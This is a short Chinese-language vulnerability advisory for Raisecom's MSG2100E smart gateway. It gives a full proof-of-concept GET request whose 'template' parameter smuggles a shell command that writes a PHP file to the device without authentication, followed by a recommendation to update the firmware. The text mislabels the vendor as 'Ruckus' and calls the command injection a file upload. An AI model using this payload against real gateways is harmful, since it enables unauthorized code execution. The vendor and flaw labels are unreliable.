一. 产品介绍
MSG2100E系列融合型多业务智能网关是瑞斯康达公司面向中小企业及行业分支机构推出的新一代语音融合接入型网络产品。该产品集数据、语音、安全、无线等功能于一体,能够为用户提供一个综合、完整的网络接入解决方案。
二. 漏洞概述
瑞斯康达(Ruckus)智能网关中的list_base_config.php接口存在任意文件上传漏洞。该漏洞允许未授权的攻击者上传恶意文件至网关,可能导致数据泄露、系统控制等严重后果。
三. 漏洞复现
漏洞链接
http://xx.xx.xx.xx/vpn/list_base_config.php?type=mod&parts=base_config&template=%60echo+-e+%27%3C%3Fphp+phpinfo%28%29%3Bunlink%28__FILE__%29%3B%3F%3E%27%3E%2Fwww%2Ftmp%2Ftteesstt1.php%60
POC:
GET /vpn/list_base_config.php?type=mod&parts=base_config&template=%60echo+-e+%27%3C%3Fphp+phpinfo%28%29%3Bunlink%28__FILE__%29%3B%3F%3E%27%3E%2Fwww%2Ftmp%2Ftteesstt1.php%60 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: xx.xx.xx.xx
上传的文件链接 http://xx.xx.xx.xxx/tmp/tteesstt1.php
四. 修复建议
更新网关固件:访问瑞斯康达官方网站,下载并安装最新的固件更新。
文章来源:网络
